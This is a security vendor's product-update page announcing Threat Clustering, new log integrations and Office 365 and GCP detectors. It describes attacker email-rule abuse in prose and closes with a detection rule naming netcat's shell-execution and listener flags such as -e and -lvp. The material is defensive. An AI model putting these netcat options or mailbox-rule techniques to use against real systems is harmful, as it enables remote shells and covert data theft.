Product updates
Threat Clustering Official Release
We’re glad to inform you that Hunters’ improved Threat Clustering abilities are now officially released to all customers!
Security teams spend enormous amounts of time triaging, investigating, and managing hundreds of alerts each day, many of which are identical with similar root causes, resulting in inefficient, and often frustrating, triage work.
Threat Clustering is a threat-centric approach for grouping, investigating, managing, and analyzing leads based on similarities in malicious intent, impact, and/or context. By reducing the Time-to-Triage and Time-to-Know, security teams will be able to scope and mitigate attacks more quickly, using lessons learned from previous investigations and mitigation steps of similar past events.
To learn more about this:
IOC Search Enhancements
The IOC Search now supports the following data types:
| Vendor | Logs | Vendor | Logs |
|---|---|---|---|
| 1password | onepassword-audit-events onepassword-item-usages-logs onepassword-sign-in-logs |
Microsoft 365 | microsoft-365-defender-alert-evidence microsoft-365-defender-alert-info |
| Agari | agari-phishing-defense-messages agari-phishing-defense-policy-events |
Microsoft Azure | azure-active-directory-users |
| Atlassian | confluence-audit-logs jira-audit-logs |
Mimecast | mimecast-attachment-protect-logs mimecast-av-logs mimecast-delivery-logs mimecast-impersonation-protect-logs mimecast-internal-email-protect-logs mimecast-process-logs mimecast-receipt-logs mimecast-spam-event-thread-logs mimecast-url-protect-logs |
| AWS | aws-config aws-elb-classic aws-inspector-findings aws-waf aws-guard-duty route53-resolver-query-logs aws-s3-server-access-logs |
Office365 | O365-audit-logs |
| Cisco | cisco-asa-firewall cisco-ftd-firewall cisco-ftd-impact-flag-logs |
Okta | okta-apps okta-groups okta-users |
| Crowdstrike | crowdstrike-detects crowdstrike-devices crowdstrike-incidents |
Orca | orca-alerts |
| GCP | gcp-audit gcp-security-command-center-assets gcp-security-command-center-findings |
Wiz | wiz-events |
| Google Workspace | gsuite-alert gsuite-directory-users |
Zscaler | zscaler-zpa-app-connector-status zscaler-zpa-audit zscaler-zpa-browser-access zscaler-zpa-user-activity zscaler-zpa-user-status zscaler-zia zscaler-zia-dns zscaler-zia-firewall |
| Meraki | meraki-clients meraki-clients-trafficip/domain meraki-security-events gsuite-directory-users |
Integrations
Seraphic Security
Seraphic is a browser security solution that protects enterprise assets and provides security teams with advanced governance and policy enforcement.
Integrating Seraphic to Hunters allows the collection and ingestion of the data, as well as leveraging the data for alerts and security content in the Hunters platform.
The new integration includes:
- a puller for the Events and Alerts endpoints
- transformation of the data to Snowflake
- native alert written over the new data
- mapping of the Events data to Login Unified Schema
Learn more here
AWS RDS Aurora
Amazon Aurora MySQL is a fully managed, MySQL-compatible, relational database engine that combines the speed and reliability of high-end commercial databases with the simplicity and cost-effectiveness of open-source databases. Amazon RDS provides administration for Aurora by handling routine database tasks such as provisioning, patching, backup, recovery, failure detection, and repair.
The new integration includes a transformer for the RDS data.
Learn more here
Azure AD Identity Protection
Hunters now supports a new data type from Azure AD. Azure AD Identity Protection produces risk detection reports provided by Microsoft.
The integration includes:
- collection via Graph API
- transformation of the data to Snowflake
- native alert written over the new data
- IOC Search over this data
Learn more here
Palo Alto Networks XDR Raw Logs
Hunters now supports the ingestion of PAN XDR Raw Logs. The raw data is mapped to 8 different unified schemas and will have multiple detections above it.
The raw data integration is only supported for data exported to AWS buckets.
Learn more here
Harness IO
Harness is a Software Delivery Platform that uses AI to simplify DevOps processes - CI, CD & GitOps, Feature Flags, Cloud Costs.
Integrating the Harness product into Hunters allows ingestion of the data, as well as consuming supported Hunters' detection and investigation content over the source.
This integration includes:
- a transformer for the Harness Audit Logs
- mapping of the events to the Login Unified Schema
Learn more here
Very Good Security
Very Good Security, a Vault product, is now supported by Hunters. Very Good Security (VGS) enables you to use your sensitive data without needing to store and secure the underlying data while retaining full utility and value.
The new integration includes a transformer for the Very Good Security Events.
Learn more here
Solarwinds Orion
Hunters now supports the ingestion of Solarwinds Orion, an infrastructure for monitoring and management platform designed to simplify IT administration for on-premises, hybrid, and software as a service (SaaS) environments in a single pane of glass.
The new integration includes:
- a transformer for the Solarwinds Orion Logs
- mapping of the events to the Login Unified Schema
Learn more here
Detection
Office 365 Detection Pack
Office 365 provides various services/applications to increase collaboration within enterprises. It’s very popular worldwide and its most commonly used services are around email platforms and data sharing.
The threats on these platforms are various: financial fraud, data exfiltration, and ransom. When these threats involve the email service, the attack is typically referred to as Business Email Compromise (BEC). When a victim is a private person or a very small organization, the attack can be referred to as Email Account Compromise (EAC).
According to 2021’s FBI report, BEC/EAC attacks are at the top of common threats in the US, with annual money thefts of $2.4B (~$7M per day) only in the US.
In this detection pack, we aim to provide a comprehensive list of detectors that cover a significant part of the common threats on Office 365.
Office 365 Suspicious Transport Rule Created
Malicious actors might create transport rules in order to gain permanent access to an organization's emails. One of the features of transport rules is the fact that the sender and/or receiver is not notified if an action was performed on the email, making it a quiet way to exfiltrate data, or to drop certain emails. The granularity is high and allows attackers to be creative.
This new detector will catch the creation and/or manipulation of exchange transport rules.
Possible Hiding of Incoming Emails using Inbox Rule
Actors create inbox rules that forward emails to alternative folders (e.g. RSS feed folder) instead of the Inbox folder. That way, they can hide incoming emails, and read them before the compromised user, which enables them seamless interception.
This new detector looks for 'new-inboxrule' or 'set-inboxrule' operations in Office 365 Unified Audit Log, with focus on three scenarios:
- Delete emails: Look for inbox rules that delete incoming emails under specific conditions (specific senders, specific words in the email subject, etc.).
- Moving emails to ‘blackhole’ folders: Look for inbox rules that move incoming emails to folders where the compromised user won’t look at, e.g., “Deleted Items”, “Spam“, etc.
- Moving emails to active folders but mark them as read: Look for inbox rules that move incoming emails to active folders where the compromised user checks regularly, but mark them as read items so they won’t capture the attention of the compromised user.
Disablement of Office 365 Exchange Audit Log
Malicious actors might disable exchange audit logging in order to evade detection or avoid other defenses. Excluding the log of disablement itself, this technique may leave very little to detect afterward making this detection crucial. This new detector is designed to detect such activity.
Office 365 Forwarding Rules to Addresses Outside the Organization
This new detector detects the creation of malicious forwarding rules defined in Office 365. Rules that forward emails to email addresses outside the organization can be used in order to leak sensitive data.
Time Series Detection
Time series detectors are used to detect anomalies and potential threats in network traffic or other types of data over time. Read about additions made to this type of detection:
GCP IAM Roles Enumeration Using GetIAMPolicy
Compared to other Cloud vendors, GCP doesn't have a centralized location for managing organization roles. Instead, IAM policies, which are composed of users, service accounts, or groups, and their respective permissions, are attached directly to resources. To find out who has access to a certain resource, and with what permissions, a target user may need to use the Get-IAM-Policy method on that particular resource.
The Get-IAM-Policy is a legitimate API call in GCP, enabling users to retrieve the IAM policy of a specified resource. Suppose an attacker manages to compromise a GCP identity, they might attempt to aggressively enumerate the IAM policies linked to other resources. This is to potentially spot misconfigurations that they can exploit to gain broader access and perform lateral movement within the GCP domain.
Due to the nature of GCP IAM, we expect this detector to be an important benchmark for detecting a variety of red teams and true positive incidents in GCP incidents, as this method is an almost mandatory step for an attacker in the GCP attacking chain.
Detection Improvements
We’ve made the following improvements to existing detectors and detection-related items:
Office 365 operations per session ID
When exploring Office365-related detectors, you’ll now be able to drill down into the operations made by an Office365 session ID.
Suspicious Execution from %ProgramData%
As part of our noise reduction efforts, we’ve made significant improvements to the Suspicious Execution from %ProgramData% detector. These changes were added after some data analysis on the most common false positive initiating processes across our customers’ data.
It should reduce the amount of total leads for this detector by about 50%.
Execution of Netcat
After an alert from our content quality system, we decided to revisit the ‘Execution of Netcat’ detector and adjust the lead creation logic.
Revaluating the thesis, we decided to create a lead only on specific flags of the “Netcat” command as opposed to creating one for any execution.
The research yielded the following flags:
Execution flags:
-e, --exec
-c,--sh-exec
--lua-exec
Telnet flag:
-t, --telnet
Often used by red team flags:
-lvp
-nlvp
The amount of noise is expected to reduce significantly based on the changes made.